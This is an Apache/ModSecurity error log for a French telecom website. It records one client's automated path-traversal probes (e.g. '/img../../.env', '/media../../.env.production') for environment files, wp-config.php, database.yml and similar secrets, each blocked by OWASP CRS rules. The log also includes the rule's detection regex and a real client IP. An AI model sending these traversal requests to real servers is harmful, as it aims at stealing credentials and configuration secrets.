[Tue May 12 04:51:13.023619 2026] [security2:error] [pid 1808852:tid 1808870] [client 93.123.109.165:46912] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVoRfeipD4uoG21FoleQAAAA8"]
[Tue May 12 04:51:13.023700 2026] [security2:error] [pid 1808852:tid 1808870] [client 93.123.109.165:46912] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVoRfeipD4uoG21FoleQAAAA8"]
[Tue May 12 04:51:13.023868 2026] [security2:error] [pid 1808852:tid 1808870] [client 93.123.109.165:46912] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVoRfeipD4uoG21FoleQAAAA8"]
[Tue May 12 04:51:13.433326 2026] [security2:error] [pid 1808852:tid 1808870] [client 93.123.109.165:46912] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVoRfeipD4uoG21FoleQAAAA8"]
[Tue May 12 04:51:14.521492 2026] [core:error] [pid 1825287:tid 1825316] [client 93.123.109.165:46918] AH10244: invalid URI path (/img../../../.env)
[Tue May 12 04:51:14.977559 2026] [core:error] [pid 1825179:tid 1825215] [client 93.123.109.165:46934] AH10244: invalid URI path (/img../../../../.env)
[Tue May 12 04:51:15.482266 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.165:32116] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVo3o6NvB9WXx5V-6h4wAAAQI"]
[Tue May 12 04:51:15.482347 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.165:32116] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVo3o6NvB9WXx5V-6h4wAAAQI"]
[Tue May 12 04:51:15.482455 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.165:32116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVo3o6NvB9WXx5V-6h4wAAAQI"]
[Tue May 12 04:51:15.870332 2026] [security2:error] [pid 1730175:tid 1730179] [client 93.123.109.165:32116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVo3o6NvB9WXx5V-6h4wAAAQI"]
[Tue May 12 04:51:15.955713 2026] [security2:error] [pid 1825179:tid 1825210] [client 93.123.109.165:32132] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVo9r1yOh9TvizeziS3wAAAEw"]
[Tue May 12 04:51:15.955782 2026] [security2:error] [pid 1825179:tid 1825210] [client 93.123.109.165:32132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVo9r1yOh9TvizeziS3wAAAEw"]
[Tue May 12 04:51:15.955887 2026] [security2:error] [pid 1825179:tid 1825210] [client 93.123.109.165:32132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVo9r1yOh9TvizeziS3wAAAEw"]
[Tue May 12 04:51:16.351478 2026] [security2:error] [pid 1825179:tid 1825210] [client 93.123.109.165:32132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVo9r1yOh9TvizeziS3wAAAEw"]
[Tue May 12 04:51:16.432606 2026] [access_compat:error] [pid 1820198:tid 1820222] [client 93.123.109.165:32138] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:51:16.921297 2026] [security2:error] [pid 1808852:tid 1808878] [client 93.123.109.165:32150] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVpBfeipD4uoG21FolgAAAABc"]
[Tue May 12 04:51:16.921433 2026] [security2:error] [pid 1808852:tid 1808878] [client 93.123.109.165:32150] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVpBfeipD4uoG21FolgAAAABc"]
[Tue May 12 04:51:17.317504 2026] [security2:error] [pid 1808852:tid 1808878] [client 93.123.109.165:32150] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVpBfeipD4uoG21FolgAAAABc"]
[Tue May 12 04:51:17.404159 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.165:32156] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVpTue9Sp-pIv_Bb64FQAAAUY"]
[Tue May 12 04:51:17.404377 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.165:32156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVpTue9Sp-pIv_Bb64FQAAAUY"]
[Tue May 12 04:51:17.787382 2026] [security2:error] [pid 1730207:tid 1730215] [client 93.123.109.165:32156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVpTue9Sp-pIv_Bb64FQAAAUY"]
[Tue May 12 04:51:17.871805 2026] [security2:error] [pid 1808852:tid 1808871] [client 93.123.109.165:32164] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /img../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVpRfeipD4uoG21FolggAAABA"]
[Tue May 12 04:51:17.871960 2026] [security2:error] [pid 1808852:tid 1808871] [client 93.123.109.165:32164] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVpRfeipD4uoG21FolggAAABA"]
[Tue May 12 04:51:18.634039 2026] [security2:error] [pid 1808852:tid 1808871] [client 93.123.109.165:32164] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVpRfeipD4uoG21FolggAAABA"]
[Tue May 12 04:51:18.999689 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:32170] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVptr1yOh9TvizeziS4gAAAEs"]
[Tue May 12 04:51:18.999773 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:32170] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVptr1yOh9TvizeziS4gAAAEs"]
[Tue May 12 04:51:18.999875 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:32170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVptr1yOh9TvizeziS4gAAAEs"]
[Tue May 12 04:51:19.393781 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:32170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVptr1yOh9TvizeziS4gAAAEs"]
[Tue May 12 04:51:19.479690 2026] [core:error] [pid 1808852:tid 1808879] [client 93.123.109.165:32172] AH10244: invalid URI path (/media../../../.env)
[Tue May 12 04:51:19.953807 2026] [core:error] [pid 1825287:tid 1825314] [client 93.123.109.165:32176] AH10244: invalid URI path (/media../../../../.env)
[Tue May 12 04:51:20.479340 2026] [security2:error] [pid 1825179:tid 1825216] [client 93.123.109.165:32180] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVqNr1yOh9TvizeziS5AAAAFI"]
[Tue May 12 04:51:20.479409 2026] [security2:error] [pid 1825179:tid 1825216] [client 93.123.109.165:32180] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVqNr1yOh9TvizeziS5AAAAFI"]
[Tue May 12 04:51:20.479528 2026] [security2:error] [pid 1825179:tid 1825216] [client 93.123.109.165:32180] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVqNr1yOh9TvizeziS5AAAAFI"]
[Tue May 12 04:51:20.868365 2026] [security2:error] [pid 1825179:tid 1825216] [client 93.123.109.165:32180] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVqNr1yOh9TvizeziS5AAAAFI"]
[Tue May 12 04:51:20.970653 2026] [security2:error] [pid 1825287:tid 1825319] [client 93.123.109.165:32186] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /media../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVqAgpmE1yW0glLdgh2AAAAM4"]
[Tue May 12 04:51:20.970728 2026] [security2:error] [pid 1825287:tid 1825319] [client 93.123.109.165:32186] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVqAgpmE1yW0glLdgh2AAAAM4"]
[Tue May 12 04:51:20.970850 2026] [security2:error] [pid 1825287:tid 1825319] [client 93.123.109.165:32186] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVqAgpmE1yW0glLdgh2AAAAM4"]
[Tue May 12 04:51:21.391979 2026] [security2:error] [pid 1825287:tid 1825319] [client 93.123.109.165:32186] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVqAgpmE1yW0glLdgh2AAAAM4"]
[Tue May 12 04:51:21.473586 2026] [access_compat:error] [pid 1730207:tid 1730230] [client 93.123.109.165:32196] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
